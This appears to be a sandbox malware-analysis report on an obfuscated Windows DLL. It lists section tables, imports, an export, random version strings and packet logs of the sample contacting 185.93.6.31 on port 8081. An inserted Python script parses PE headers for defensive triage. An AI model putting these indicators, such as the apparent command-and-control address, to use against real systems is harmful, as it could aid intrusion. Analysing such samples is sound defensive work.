.rdata | 0x4000 | 0x4d0 | 0x600 | False | 0.203125 | data | 3.73422898826 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.pdata | 0x5000 | 0x1d4 | 0x200 | False | 0.55078125 | data | 3.51485716452 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.xdata | 0x6000 | 0x13c | 0x200 | False | 0.330078125 | data | 2.72538928976 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.bss | 0x7000 | 0x130 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.edata | 0x8000 | 0x52 | 0x200 | False | 0.150390625 | data | 0.911674614809 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.idata | 0x9000 | 0x3d0 | 0x400 | False | 0.3857421875 | data | 3.64644739475 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.CRT | 0xa000 | 0x58 | 0x200 | False | 0.0546875 | data | 0.201539378135 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.tls | 0xb000 | 0x10 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x348 | 0x400 | False | 0.40625 | data | 2.93565824528 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.reloc | 0xd000 | 0x60 | 0x200 | False | 0.19921875 | data | 1.04604922619 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/4 | 0xe000 | 0x280 | 0x400 | False | 0.1669921875 | data | 1.13971139807 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/19 | 0xf000 | 0x6dca | 0x6e00 | False | 0.423828125 | data | 5.99594303113 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/31 | 0x16000 | 0x13dd | 0x1400 | False | 0.2556640625 | data | 4.74282532473 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/45 | 0x18000 | 0x1a94 | 0x1c00 | False | 0.43359375 | data | 5.31317935931 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/57 | 0x1a000 | 0x6f8 | 0x800 | False | 0.34521484375 | data | 3.91434995831 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/70 | 0x1b000 | 0x29d | 0x400 | False | 0.3271484375 | data | 3.73490169641 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/81 | 0x1c000 | 0x2e73 | 0x3000 | False | 0.194742838542 | data | 2.12431889847 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
/92 | 0x1f000 | 0x7a0 | 0x800 | False | 0.16845703125 | data | 1.45626524275 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
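The section table above (twenty sections, eight of them named /4 through /92, and an empty DLL Characteristics field in the header block) is the kind of output a triage script should reproduce without a sandbox. The Python below is an added example, not code from the report or from the sample: with the standard library only it parses the COFF file header, the DllCharacteristics field and the section table out of raw bytes, computes per-section entropy, flags names outside the common set, and resolves /N names through the COFF string table, which is what the PE/COFF specification says such names are (offsets to section names longer than 8 bytes, typically the DWARF .debug_* sections a GCC/MinGW build leaves in). The image it parses is constructed inline by build_sample(); it is not the analysed DLL.

```python
"""Stdlib-only PE section triage: names, entropy, '/N' long names, ASLR/DEP opt-in flags.

Added illustration; build_sample() is a constructed PE32+ image, not the analysed DLL.
"""
import math
import struct

COMMON_NAMES = {".text", ".data", ".rdata", ".pdata", ".xdata", ".bss", ".edata",
                ".idata", ".rsrc", ".reloc", ".tls", ".CRT"}
DLLCHAR_DYNAMIC_BASE, DLLCHAR_NX_COMPAT = 0x0040, 0x0100     # ASLR and DEP opt-in bits
SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x20000000, 0x80000000


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty or single-valued data."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return sum(-(c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes) -> dict:
    """Return header opt-in flags plus one dict per section; ValueError on malformed input."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _m, nsect, _ts, symtab, nsyms, opt_size, _c = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", image, opt + 70)[0]  # same offset in PE32 and PE32+
    strtab = symtab + nsyms * 18 if symtab else 0             # string table follows the symbols
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        raw_name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, off)
        chars = struct.unpack_from("<I", image, off + 36)[0]
        name = raw_name.rstrip(b"\0").decode("latin-1")
        long_name = None
        if strtab and name.startswith("/") and name[1:].isdigit():
            # PE/COFF: '/N' means the real name sits at decimal offset N in the string table
            p = strtab + int(name[1:])
            long_name = image[p:image.index(b"\0", p)].decode("latin-1")
        sections.append({
            "name": name, "long_name": long_name, "va": va, "vsize": vsize, "rawsize": rawsize,
            "entropy": round(entropy(image[rawptr:rawptr + rawsize]), 3),
            "non_standard": name not in COMMON_NAMES,
            "executable": bool(chars & SCN_MEM_EXECUTE), "writable": bool(chars & SCN_MEM_WRITE),
        })
    return {"pe32plus": magic == 0x20B, "aslr": bool(dll_chars & DLLCHAR_DYNAMIC_BASE),
            "dep": bool(dll_chars & DLLCHAR_NX_COMPAT), "sections": sections}


def findings(info: dict) -> list:
    """Triage notes a reviewer would want from parse_pe() output."""
    notes = []
    if not info["aslr"]:
        notes.append("DllCharacteristics lacks DYNAMIC_BASE: no ASLR opt-in")
    if not info["dep"]:
        notes.append("DllCharacteristics lacks NX_COMPAT: no DEP opt-in")
    for s in info["sections"]:
        if s["long_name"]:
            notes.append(f"{s['name']} resolves to {s['long_name']} via the COFF string table")
        elif s["non_standard"]:
            notes.append(f"non-standard section name {s['name']}")
        if s["executable"] and s["writable"]:
            notes.append(f"{s['name']} is writable and executable")
        if s["entropy"] > 7.0:
            notes.append(f"{s['name']} entropy {s['entropy']} suggests packed or encrypted data")
    return notes


def build_sample() -> bytes:
    """Constructed PE32+ image: .text, .rdata and '/4', DllCharacteristics 0, COFF string table."""
    hdr = 0x40 + 4 + 20 + 240 + 3 * 40                  # DOS + 'PE\0\0' + COFF + optional + 3 headers
    text, rdata, dbg = bytes(range(256)) * 2, b"A" * 512, b"\x01\x02" * 128
    text_off, rdata_off, dbg_off = hdr, hdr + len(text), hdr + len(text) + len(rdata)
    strtab_off = dbg_off + len(dbg)
    strtab = struct.pack("<I", 4 + len(b".debug_info\0")) + b".debug_info\0"
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 0, strtab_off, 0, 240, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * 238         # every other optional-header field zero

    def sh(name, size, va, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, ptr, 0, 0, 0, 0, chars)

    headers = (sh(b".text", len(text), 0x1000, text_off, 0x60000020)
               + sh(b".rdata", len(rdata), 0x2000, rdata_off, 0x40000040)
               + sh(b"/4", len(dbg), 0x3000, dbg_off, 0x42000040))
    return dos + b"PE\0\0" + coff + opt + headers + text + rdata + dbg + strtab
```

Run against a real file with parse_pe(open(path, "rb").read()); the string-table lookup only fires when PointerToSymbolTable is non-zero, which is the case for unstripped GCC/MinGW output and is why the /N names appear in the table above at all, and a DllCharacteristics of 0 is what the empty field in the Static PE Info block denotes.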

              Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xc078 | 0x2d0 | data | English | United States

              Imports

DLL | Import
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, GetModuleHandleA, GetProcAddress, InitializeCriticalSection, LeaveCriticalSection, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
msvcrt.dll | __iob_func, _amsg_exit, _initterm, _lock, _unlock, abort, calloc, free, fwrite, memmove, realloc, strlen, strncmp, vfprintf

              Exports

              Name | Ordinal | Address
              gSDCSXjfiSV | 1 | 0x6bc01400

              Version Infos

              Description | Data
              LegalCopyright | aJqspleKQJF
              InternalName | iPytEhMTqI
              FileVersion | 19.17.4.4
              CompanyName | dJkgPCXZKBkDChG
              ProductName | iPytEhMTqI
              ProductVersion | 17.14.16.11
              FileDescription | TtuzAbhuOgvjXTx
              OriginalFilename | GnGmRmwtZJjkTEt.dll
              Translation | 0x0809 0x04b0

              Possible Origin

              Language of compilation system | Country where language is spoken | Map
              English | United States | 

              Network Behavior

              Network Port Distribution

              TCP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Sep 25, 2021 20:18:10.878832102 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.906856060 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.906960964 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.907609940 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.935214996 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.938972950 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.938998938 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939024925 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939045906 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939069033 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939086914 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939086914 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.939102888 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939141035 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939157009 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.939168930 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939193010 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.939205885 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.939229965 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.939275980 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965548992 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965584993 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965615988 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965657949 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965656996 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965683937 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965703011 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965708017 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965729952 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965751886 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965754986 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965775967 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965791941 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965806961 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965831041 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965840101 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965852976 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965879917 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965903997 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965905905 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965924978 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965931892 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965965986 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.965981960 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.965987921 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.966010094 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.966017962 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.966032028 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.966052055 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.966053963 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.966095924 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.993982077 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994023085 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994048119 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994070053 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994092941 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994115114 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994127989 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994137049 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994160891 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994160891 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994182110 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994206905 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994227886 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994241953 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994246960 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994249105 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994270086 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994272947 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994293928 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994316101 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994317055 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994338989 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994343996 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994360924 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994388103 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994388103 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994410038 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994425058 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994431019 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994453907 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994473934 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994483948 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994494915 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994518995 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994520903 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994539976 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994544983 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994565010 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994590044 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994592905 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994616032 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994622946 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994640112 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994657993 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994678974 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994700909 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994700909 CEST | 49740 | 8081 | 192.168.2.7 | 185.93.6.31
              Sep 25, 2021 20:18:10.994723082 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7
              Sep 25, 2021 20:18:10.994740963 CEST | 8081 | 49740 | 185.93.6.31 | 192.168.2.7

              UDP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Sep 25, 2021 20:18:21.100399971 CEST | 51837 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:18:21.129476070 CEST | 53 | 51837 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:18:35.754415989 CEST | 55411 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:18:35.774538040 CEST | 53 | 55411 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:18:54.993717909 CEST | 63668 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:18:55.014594078 CEST | 53 | 63668 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:18:56.591945887 CEST | 54640 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:18:56.637037039 CEST | 53 | 54640 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:18:57.827560902 CEST | 58739 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:18:57.855509996 CEST | 53 | 58739 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:18:57.875310898 CEST | 60338 | 53 | 192.168.2.7 | 8.8.8.8
